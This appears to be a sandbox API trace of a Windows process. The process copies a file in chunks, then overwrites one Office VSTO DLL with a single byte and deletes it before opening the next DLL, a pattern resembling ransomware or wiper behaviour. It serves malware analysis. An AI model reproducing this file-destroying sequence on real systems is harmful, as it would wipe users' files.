SetLastError (dwErrCode=0x0) [0104.216] SetLastError (dwErrCode=0x0) [0104.216] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.216] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.217] SetLastError (dwErrCode=0x0) [0104.217] SetLastError (dwErrCode=0x0) [0104.217] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.217] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.217] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.217] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.217] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.217] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.218] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.218] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.219] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.219] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.219] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.219] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.219] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.219] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.219] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.219] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.220] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.220] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.220] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.220] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.220] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.220] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.221] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.221] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.221] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.221] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.221] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.221] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.221] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.222] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.222] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.222] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.222] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.269] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.270] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.270] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.270] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.270] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.270] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.270] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.270] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.271] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.271] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.271] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.271] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.271] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.271] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.271] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.272] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.272] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.272] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.272] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.272] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.272] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.273] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0xa70, lpOverlapped=0x0) returned 1 [0104.273] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.273] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0104.273] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327ef70*=0xa70, lpOverlapped=0x0) returned 1 [0104.273] CloseHandle (hObject=0x368) returned 1 [0104.274] CloseHandle (hObject=0x27c) returned 1 [0104.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.277] GetFileType (hFile=0x27c) returned 0x1 [0104.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0104.278] WriteFile (in: hFile=0x27c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0104.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x944a8 | out: hHeap=0x20000) returned 1 [0104.278] CloseHandle (hObject=0x27c) returned 1 [0104.279] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll")) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0104.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0104.280] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.280] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.280] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0xbee8, dwReserved0=0x1, dwReserved1=0x0, cFileName="VSTOMessageProvider.dll", cAlternateFileName="VSTOME~1.DLL")) returned 1 [0104.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x80fc0 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0104.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0104.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0104.281] AreFileApisANSI () returned 1 [0104.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll", lpUsedDefaultChar=0x0) returned 81 [0104.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0104.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0104.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0104.282] AreFileApisANSI () returned 1 [0104.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0104.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f2c8 [0104.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 81 [0104.282] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.282] GetFileType (hFile=0x27c) returned 0x1 [0104.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0104.282] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0104.283] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0104.283] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 